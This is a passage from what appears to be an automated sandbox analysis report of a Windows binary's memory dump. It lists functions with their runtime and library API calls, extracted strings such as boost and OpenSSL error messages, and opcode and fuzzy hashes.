Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

Strings

]sB, xrefs: 004B18F5
unexpected end of data, xrefs: 004B18D4

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionException@8H_prologRaiseThrow___std_exception_copystd::exception::exception
String ID: ]sB$unexpected end of data
API String ID: 281195438-1396046059
Opcode ID: 8436d5d64c085b4e5975d4d7caa444e6e8faba723002e956a96cb5f5dc47cca9
Instruction ID: 28003f3a82d923fbfebec6430535399792a7ce05a437f4428733450ed7ae290e
Opcode Fuzzy Hash: 8436d5d64c085b4e5975d4d7caa444e6e8faba723002e956a96cb5f5dc47cca9
Instruction Fuzzy Hash: 5F0192B1C043499FDB20EF64C0197EBBBF4AB04354F50865AD89063252D3790A058B95

Uniqueness

Uniqueness Score: -1.00%

Function 004B1793, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B1798
std::exception::exception.LIBCONCRT ref: 004B17DC

Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358

__CxxThrowException@8.LIBVCRUNTIME ref: 004B180A

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

Strings

]sB, xrefs: 004B17F3
unexpected end of data, xrefs: 004B17D2

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionException@8H_prologRaiseThrow___std_exception_copystd::exception::exception
String ID: ]sB$unexpected end of data
API String ID: 281195438-1396046059
Opcode ID: f1c7a55ee33ee4d26536c07a98d0701b91f4e36793ed4c5e3b8c0de1c7cdda15
Instruction ID: 2d672e01886c1d7e0604dcbb40f25a2efe4af2ca1d2d010918ed64cfe91d5dec
Opcode Fuzzy Hash: f1c7a55ee33ee4d26536c07a98d0701b91f4e36793ed4c5e3b8c0de1c7cdda15
Instruction Fuzzy Hash: C5018FB1D043499BDB20DF64C1297EFBBF8EF04364F50869AD89163382D7790A459B94

Uniqueness

Uniqueness Score: -1.00%

Function 004B1810, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B1815
std::exception::exception.LIBCONCRT ref: 004B1859

Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358

__CxxThrowException@8.LIBVCRUNTIME ref: 004B188A

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

Strings

]sB, xrefs: 004B1873
unexpected end of data, xrefs: 004B184F

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionException@8H_prologRaiseThrow___std_exception_copystd::exception::exception
String ID: ]sB$unexpected end of data
API String ID: 281195438-1396046059
Opcode ID: dac8445dca53a7ff26b4dfb482ff05d5e2f6843fc6ad69035ce58efb63b7bf9d
Instruction ID: bd1703f90d0bc2861500963252f7ea30ffbbd2942f73b5b912d4856f1ea328ab
Opcode Fuzzy Hash: dac8445dca53a7ff26b4dfb482ff05d5e2f6843fc6ad69035ce58efb63b7bf9d
Instruction Fuzzy Hash: 5D01BCB0C042499BCB20EFA8C0196AFBBF4EB04350F5085AED9A063382E7780A05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00410B77, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00410B7C

Strings

asio.ssl.stream error, xrefs: 00410B9D
unspecified system error, xrefs: 00410BB0
unexpected result, xrefs: 00410BA9
stream truncated, xrefs: 00410BB7

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: asio.ssl.stream error$stream truncated$unexpected result$unspecified system error
API String ID: 3519838083-2829376187
Opcode ID: de9d8fd7051e429d456dd5763d4d241555d8bf84ff351a934326fcdabac9abb0
Instruction ID: c52cf6cd5b291364cfd55c7ebb1438d378ac92a48c039e73809839f1fe6799b5
Opcode Fuzzy Hash: de9d8fd7051e429d456dd5763d4d241555d8bf84ff351a934326fcdabac9abb0
Instruction Fuzzy Hash: DBF0B4B2998239DBD7109FDCD9119EABB68FB05704F00420BB805A2301C7F99AC08789

Uniqueness

Uniqueness Score: -1.00%

Function 00693A92, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52048ab17d6f23fb2466876576d5e4ef559e7931fc4e039c35f9bba20833728e
Instruction ID: 3d0fb1ce620077e56f4f7a15449c3dd8af87b35fe6a182fdba52835ecc8d530d
Opcode Fuzzy Hash: 52048ab17d6f23fb2466876576d5e4ef559e7931fc4e039c35f9bba20833728e
Instruction Fuzzy Hash: F9716C35901636DBCF219B59C884AFEBB7EEF55360B24422AE811A7B81D7708E45C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 004258C5, Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004258CA
EnterCriticalSection.KERNEL32(?), ref: 004258DE
LeaveCriticalSection.KERNEL32(?), ref: 004258F4
EnterCriticalSection.KERNEL32(?), ref: 00425928
LeaveCriticalSection.KERNEL32(?), ref: 00425951

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$EnterLeave$H_prolog
String ID:
API String ID: 1633115879-0
Opcode ID: 45d542f17fc25f910b7d54190d370e9922d85ef1c75a6e8389245df761c58c9a
Instruction ID: 635df1c7be75a178799a10da7e940f2068e2ac44dcdc1def3dd9b0ebd143829b
Opcode Fuzzy Hash: 45d542f17fc25f910b7d54190d370e9922d85ef1c75a6e8389245df761c58c9a
Instruction Fuzzy Hash: 75113871E42955EBCB00EBA4E5547FEBB74EF11311F54000BE04163240C7780B49C7EA

Uniqueness

Uniqueness Score: -1.00%

Function 00426206, Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042620B
EnterCriticalSection.KERNEL32(?), ref: 0042621E
new.LIBCMT ref: 0042623A
new.LIBCMT ref: 00426255

Part of subcall function 00680AF7: Concurrency::cancel_current_task.LIBCPMT ref: 00680B0F

Part of subcall function 00414AA6: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414ABB
Part of subcall function 00414AA6: GetLastError.KERNEL32(?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414ACD
Part of subcall function 00414AA6: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414B0F
Part of subcall function 00414AA6: GetLastError.KERNEL32(?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414B21
Part of subcall function 00414AA6: GetLastError.KERNEL32(?,?,?,?,?,?,?,00414E92,00000000), ref: 00414B86
Part of subcall function 00414AA6: CloseHandle.KERNEL32(00000000), ref: 00414B9C
Part of subcall function 00414AA6: CloseHandle.KERNEL32(00000000), ref: 00414BAA

Part of subcall function 0041B4D3: CloseHandle.KERNEL32(?), ref: 0041B4E3

LeaveCriticalSection.KERNEL32(?), ref: 00426297

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CloseErrorHandleLast$CreateCriticalEventSection$Concurrency::cancel_current_taskEnterH_prologLeave
String ID:
API String ID: 3301521748-0
Opcode ID: 7e8c5b01d99a5f1721d956ede7001678f6f04de6a3ef76bab69c25dd42297c4e
Instruction ID: 579873a170e2e28824d5a567c31e82e36564d8d158495a94aacee1d17b6eb865
Opcode Fuzzy Hash: 7e8c5b01d99a5f1721d956ede7001678f6f04de6a3ef76bab69c25dd42297c4e
Instruction Fuzzy Hash: 4511D071D01348EFDB01DFA8D949B9EBBF8BF45314F10859EE055AB282C7B85A04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 006A0C42, Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00692DE2,00697424,?,006A0BEC,00000001,00000364,?,0068BA4F,0077A468,00000010), ref: 006A0C47
_free.LIBCMT ref: 006A0C7C
_free.LIBCMT ref: 006A0CA3
SetLastError.KERNEL32(00000000), ref: 006A0CB0
SetLastError.KERNEL32(00000000), ref: 006A0CB9

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: bf7f88f3658c98fdd04a04bdbcdf48bbbfb306abecfaf62f0e148c8087a49ad8
Instruction ID: 2144439a5ed14aecc1273a3d97b3b9d43108420431a12b520624d03290616fad
Opcode Fuzzy Hash: bf7f88f3658c98fdd04a04bdbcdf48bbbfb306abecfaf62f0e148c8087a49ad8
Instruction Fuzzy Hash: D801F47268570166E71233356E85E6B266F9BD3771B30032DFA07D2252EA748C039A68

Uniqueness

Uniqueness Score: -1.00%

Function 006A9A45, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006A9A5D

Part of subcall function 0069742F: HeapFree.KERNEL32(00000000,00000000), ref: 00697445
Part of subcall function 0069742F: GetLastError.KERNEL32(?,?,006A9CF8,?,00000000,?,00000000,?,006A9F9C,?,00000007,?,?,006AA385,?,?), ref: 00697457

_free.LIBCMT ref: 006A9A6F
_free.LIBCMT ref: 006A9A81
_free.LIBCMT ref: 006A9A93
_free.LIBCMT ref: 006A9AA5

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 84abf75f47a7e05b3795e55955993564d6dc468ff77a3055e6a1dd9507dcdcb2
Instruction ID: eb41a56f5fb8855e02b1af917fcd00e9b383d187ed3ebc1102283d1f3378837e
Opcode Fuzzy Hash: 84abf75f47a7e05b3795e55955993564d6dc468ff77a3055e6a1dd9507dcdcb2
Instruction Fuzzy Hash: 6BF012325546006BCB60EB68E486D5677EFEA41B107F4E80AF249D7A01CB34FC928B78

Uniqueness

Uniqueness Score: -1.00%

Function 0042847C, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 285COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00428481

Part of subcall function 0049E81D: __EH_prolog.LIBCMT ref: 0049E822

Part of subcall function 0042839C: __EH_prolog.LIBCMT ref: 004283A1

Part of subcall function 004A9C20: __EH_prolog.LIBCMT ref: 004A9C25

Part of subcall function 004AA80A: __EH_prolog.LIBCMT ref: 004AA80F

Strings

#text, xrefs: 00428545, 00428693, 0042869F, 004286A7, 004286C6
err data!!, xrefs: 00428776

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: #text$err data!!
API String ID: 3519838083-892745888
Opcode ID: 9988c1091f606ea7003c7f581e5d41a082e093f08e35ee40a20ccd80f80ee375
Instruction ID: 8360e7377713226507a8297a6a8058f27af040c7adec12e5ed891f46d0503605
Opcode Fuzzy Hash: 9988c1091f606ea7003c7f581e5d41a082e093f08e35ee40a20ccd80f80ee375
Instruction Fuzzy Hash: 03A1B131A01218EFDF10DBE9D941AEEBBB5AF48304F10416EE505A7261DF389E49CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7D2, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0041A7D6

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

__EH_prolog.LIBCMT ref: 0041A7E1

Part of subcall function 0041D2CE: __EH_prolog.LIBCMT ref: 0041D2D3

Part of subcall function 00478772: __EH_prolog.LIBCMT ref: 00478777
Part of subcall function 00478772: GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00478826
Part of subcall function 00478772: GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000), ref: 0047882D

Part of subcall function 00414332: std::_Throw_Cpp_error.LIBCPMT ref: 0041433D

Strings

q, xrefs: 0041A85F
K, xrefs: 0041A86D

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$AddressCpp_errorExceptionException@8HandleModuleProcRaiseThrowThrow_std::_
String ID: K$q
API String ID: 3644655947-1432623935
Opcode ID: 2d104ef935f024dafcec345fa591b6d4ac10e989384828f740770137ee1d9021
Instruction ID: 5c569cf4fd579674ecb52f27345813c34445597b6c220660fb418753f6a1aa45
Opcode Fuzzy Hash: 2d104ef935f024dafcec345fa591b6d4ac10e989384828f740770137ee1d9021
Instruction Fuzzy Hash: 7381B371D0024CAEDB10DFA9DC41BEDBBB8EF15304F10426FF505A61A2EBB85A85CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0046ECE5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 168COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0046ECEA

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

Strings

9, xrefs: 0046ED1F
F, xrefs: 0046ED7D
2, xrefs: 0046ED76

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DeallocateH_prologstd::_
String ID: 2$9$F
API String ID: 3881773970-2004811662
Opcode ID: c39eb32ce63f43c5ae47ab02d914c06816b18f4ee7e1b64426f9f1386cacd853
Instruction ID: 7cf2c20400073983725d21fffd39660df008590cfb069ba4accbdf1f08bd6498
Opcode Fuzzy Hash: c39eb32ce63f43c5ae47ab02d914c06816b18f4ee7e1b64426f9f1386cacd853
Instruction Fuzzy Hash: AE610671D05248DECF00EFA9D9563EDBFB4AF65304F1480AEE405A7242EB795B04CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 005D78A0, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

crypto\async\async.c, xrefs: 005D78EE, 005D793D, 005D7962, 005D79AF, 005D79C9, 005D7A1D
_{], xrefs: 005D78A1, 005D791A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: _{]$crypto\async\async.c
API String ID: 0-63007400
Opcode ID: 4377226890bcad742d763c4d5ba8234dc09cbe0029a0f0a5c1708ec422f62204
Instruction ID: f5fb42af170ee742935a4132d391c3cfe29256f440dab69397669cec561bbff1
Opcode Fuzzy Hash: 4377226890bcad742d763c4d5ba8234dc09cbe0029a0f0a5c1708ec422f62204
Instruction Fuzzy Hash: A34129B67853063EF23036E56C4BF6A3F49FB94B66F00043BFB08A82C2F692551051A2

Uniqueness

Uniqueness Score: -1.00%

Function 0042A5B0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042A5B5

Part of subcall function 00472AE5: __EH_prolog.LIBCMT ref: 00472AEA

Part of subcall function 0045D80A: __EH_prolog.LIBCMT ref: 0045D80F

Strings

:bnotes, xrefs: 0042A6F3
I, xrefs: 0042A61F
u, xrefs: 0042A618

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: :bnotes$I$u
API String ID: 3519838083-2529854693
Opcode ID: c7437585bd8e895e0d4099734e75e5ae3bc0f164205e3822579f30c0a1f02285
Instruction ID: 6ea0f11293df022cdc23ac94e79abb51913f935bb619a8720b4c2ba2fa083608
Opcode Fuzzy Hash: c7437585bd8e895e0d4099734e75e5ae3bc0f164205e3822579f30c0a1f02285
Instruction Fuzzy Hash: F151D3B0C05258EADB10EFA5DD51BEEBB78AF21308F1480AEE40577192DB781F48CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004298C9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 148networkCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004298CE

Part of subcall function 0049E2AB: __EH_prolog.LIBCMT ref: 0049E2B0

Part of subcall function 00425FE4: htonl.WS2_32(?), ref: 0042600C
Part of subcall function 00425FE4: htonl.WS2_32(00000000), ref: 00426013

Part of subcall function 00416F1E: __EH_prolog.LIBCMT ref: 00416F23

htonl.WS2_32(00000000), ref: 0042994C
htons.WS2_32(?), ref: 00429979

Strings

W;\, xrefs: 0042996F

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prologhtonl$htons
String ID: W;\
API String ID: 3130446954-3369931712
Opcode ID: 5dadade83c10724c16d748479d01aa265dd1f5d52f8e5990c1ffe8b527154383
Instruction ID: 1b149bc038bf14f3f9bc5f044bc4974a1c9e7ec01276c9af39dbe4d4be6bb0be
Opcode Fuzzy Hash: 5dadade83c10724c16d748479d01aa265dd1f5d52f8e5990c1ffe8b527154383
Instruction Fuzzy Hash: 5D5137B1D04258EEDB15DFA9C985BDDFBB4BF08304F1481AEE548E7242DB34AA44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00416939, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 109COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041693E

Strings

d, xrefs: 00416954
Day of month is not valid for year, xrefs: 00416A18
2hA, xrefs: 00416A36

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: 2hA$Day of month is not valid for year$d
API String ID: 3519838083-22257888
Opcode ID: 21429949250e0a761f864e52af5f6eab0d7a7afec6a5c1466ab49487b967b6f1
Instruction ID: 31f4a860ab4f5ffecdb93295509815f36f174d02eb601e94c558808bbdc1976b
Opcode Fuzzy Hash: 21429949250e0a761f864e52af5f6eab0d7a7afec6a5c1466ab49487b967b6f1
Instruction Fuzzy Hash: F331F4B3B001149BEB14DF69DD0A7EFB7A5AB54354F06812BF404EB2C0E678CE808294

Uniqueness

Uniqueness Score: -1.00%

Function 0049E165, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0049E16A

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

Strings

unnamed-grammar, xrefs: 0049E17A
unnamed-rule, xrefs: 0049E1AC
a-zA-Z0-9_.~-, xrefs: 0049E22C

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DeallocateH_prologstd::_
String ID: a-zA-Z0-9_.~-$unnamed-grammar$unnamed-rule
API String ID: 3881773970-4031823321
Opcode ID: ddeeb2d530775f557659f112334dbbf4c5246d766158351606e78d3d27c4fff0
Instruction ID: f5c82557553fb391735af34c30f28254a480eaa0f7b63603bd9198e6db32ce01
Opcode Fuzzy Hash: ddeeb2d530775f557659f112334dbbf4c5246d766158351606e78d3d27c4fff0
Instruction Fuzzy Hash: CB3125B1C0121C9EDB01DFE5C981AEEFBB4FF18304F50416EE545A7241E7B82A09CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 005C6680, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005C66B2
GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 005C66FB
GetLastError.KERNEL32 ref: 005C6705

Strings

boost::filesystem::current_path, xrefs: 005C670F

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CurrentDirectory$ErrorLast
String ID: boost::filesystem::current_path
API String ID: 1128942804-4026011040
Opcode ID: ddcd324dee24cce718f01fc56e29b8f85d000cff4577628fa69aca6197d53fae
Instruction ID: 58de6259b278fae44209116a705dda5ce515993bf201b2b08e1a9a0e14031124
Opcode Fuzzy Hash: ddcd324dee24cce718f01fc56e29b8f85d000cff4577628fa69aca6197d53fae
Instruction Fuzzy Hash: 9211B271A01219AFDB04EFA4DC56F6FBBE8FB04754F40452EF806D72C1EB799A0486A0

Uniqueness

Uniqueness Score: -1.00%

Function 004ABDA2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004ABDA7
__To_wide.LIBCPMT ref: 004ABDF3
_wcslen.LIBCMT ref: 004ABE1D

Strings

invalid char filename argument, xrefs: 004ABDFE

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prologTo_wide_wcslen
String ID: invalid char filename argument
API String ID: 3743069396-1242024027
Opcode ID: ba8e17247b40fd7b607c00028a4adbbb03a082645ec66642810fa43b0ac322ff
Instruction ID: 49dd71b8bb12341492ec0e9be690b7f0e2517740065b224252711a030f596c6c
Opcode Fuzzy Hash: ba8e17247b40fd7b607c00028a4adbbb03a082645ec66642810fa43b0ac322ff
Instruction Fuzzy Hash: 7A219D71D012099EDB14EF98D985AEEBBB8FF19300F1001AEE004A7281D7755F40CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414F0D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,?,?,?,?,006B1B5E,000000FF,?,00414EC2), ref: 00414F76
CloseHandle.KERNEL32(00000000), ref: 00414F8F
CloseHandle.KERNEL32(00000000), ref: 00414FAA

Part of subcall function 004152B4: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 004152DB
Part of subcall function 004152B4: GetLastError.KERNEL32 ref: 004152E5

Part of subcall function 00414A42: WaitForMultipleObjects.KERNEL32 ref: 00414A60
Part of subcall function 00414A42: CloseHandle.KERNEL32(?), ref: 00414A69
Part of subcall function 00414A42: TerminateThread.KERNEL32(?,00000000), ref: 00414A83

Part of subcall function 0041B4D3: CloseHandle.KERNEL32(?), ref: 0041B4E3

Strings

IA, xrefs: 00414FB3

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CloseHandle$CompletionCriticalDeleteErrorLastMultipleObjectsPostQueuedSectionStatusTerminateThreadWait
String ID: IA
API String ID: 1875059124-3293647318
Opcode ID: 0318b04e8aa720d527bdc33bca1fa7e1ef94529c4dfe395a1d531f0b97a6a334
Instruction ID: bc64d5f9fcb98af22e7e1fdf9e08d116d6cceaadcfa9556ee4f2e636cb451c7b
Opcode Fuzzy Hash: 0318b04e8aa720d527bdc33bca1fa7e1ef94529c4dfe395a1d531f0b97a6a334
Instruction Fuzzy Hash: 0721CD30804684EBCB21EF69D90579EFBF5EF41714F14466EE04257BA1C7B82A44CB95

Uniqueness

Uniqueness Score: -1.00%

Function 005C65C0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

CreateDirectoryExW.KERNEL32 ref: 005C65F3
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,006D2049), ref: 005C65FB
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,006D2049,000000FF), ref: 005C660E

Part of subcall function 005CB3A0: __CxxThrowException@8.LIBVCRUNTIME ref: 005CB41D

Strings

boost::filesystem::create_directory, xrefs: 005C6631

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CreateDirectory$ErrorException@8LastThrow
String ID: boost::filesystem::create_directory
API String ID: 1759940808-2941204237
Opcode ID: 7cb0619d6e30ac084c4f30ab8fd2c5486e7463af0cae17e0e23a2d5ad36e4610
Instruction ID: f9a41174d69db771b506a2521d9c89ef8f1281f02ac36995561b7b9a49c3e768
Opcode Fuzzy Hash: 7cb0619d6e30ac084c4f30ab8fd2c5486e7463af0cae17e0e23a2d5ad36e4610
Instruction Fuzzy Hash: 5701D436A002116BDB007BA56C86F6F775DBF94724F44042EFC0693242EA28DA0A86B6

Uniqueness

Uniqueness Score: -1.00%

Function 0042A28A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0042A28E

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

__CxxThrowException@8.LIBVCRUNTIME ref: 0042A2F3

Strings

q, xrefs: 0042A2B5
^, xrefs: 0042A2BC

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: ^$q
API String ID: 3476068407-1334409892
Opcode ID: 0d83f10818238b4b8eba4a6834778e4fa47269f40764f57bc73dc9e02ad11405
Instruction ID: d2f4c8b767366affaef9942ba31f639a1f63fbe83029946e2e7930c12567b88d
Opcode Fuzzy Hash: 0d83f10818238b4b8eba4a6834778e4fa47269f40764f57bc73dc9e02ad11405
Instruction Fuzzy Hash: BB01F47180025C6ADB04DBBCD846AEEBBF9EF0C310F10166DE945A6051E7B466948BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0056E6CB, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0056E6D0

Part of subcall function 00570EF6: __EH_prolog.LIBCMT ref: 00570EFB

Part of subcall function 0056D503: __EH_prolog.LIBCMT ref: 0056D508

_strlen.LIBCMT ref: 0056E720

Strings

IV, xrefs: 0056E6EE
nV, xrefs: 0056E700

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$_strlen
String ID: IV$nV
API String ID: 1490583215-3003290294
Opcode ID: 9cc28a82166bf537dfcf5fa2a57a00f04aa88e1f05643059e7606d75af269d1e
Instruction ID: 3628680f0406b5570ccf596cb4b62b01a4657c33aa40d4ee7c5d424085a19e0a
Opcode Fuzzy Hash: 9cc28a82166bf537dfcf5fa2a57a00f04aa88e1f05643059e7606d75af269d1e
Instruction Fuzzy Hash: AA0124B1901684EEE725DF2C98456EEFFF8EF85320F10476EE55193292D7F41A408754

Uniqueness

Uniqueness Score: -1.00%

Function 0042646F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00426474

Part of subcall function 00410C2A: __EH_prolog.LIBCMT ref: 00410C2F

Part of subcall function 004125BB: __CxxThrowException@8.LIBVCRUNTIME ref: 004125D5

__EH_prolog.LIBCMT ref: 004264AC

Part of subcall function 004AAC0D: __EH_prolog.LIBCMT ref: 004AAC12

Strings

boost::thread_resource_error, xrefs: 0042647C
\A, xrefs: 0042648F

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Exception@8Throw
String ID: \A$boost::thread_resource_error
API String ID: 1007369359-2274436434
Opcode ID: 5b4e8b6dcd02c03f375c1e6d9bf5f764ccd41d8435a37464d11d85a125eabe76
Instruction ID: 895da255b69faa81acbbe5371d9688a182c865f36cab1bdf80bee9e006fe8511
Opcode Fuzzy Hash: 5b4e8b6dcd02c03f375c1e6d9bf5f764ccd41d8435a37464d11d85a125eabe76
Instruction Fuzzy Hash: 4D016DB1D01229DBDB14EFA8C9167EEBBB4EF00305F10055EE801A7281EBB94B54CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 00410D94, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00410D99
CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 00410DAB

Part of subcall function 00410C2A: __EH_prolog.LIBCMT ref: 00410C2F

Part of subcall function 004125BB: __CxxThrowException@8.LIBVCRUNTIME ref: 004125D5

Strings

boost::thread_resource_error, xrefs: 00410DB5
\A, xrefs: 00410DC8

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$CreateEventException@8Throw
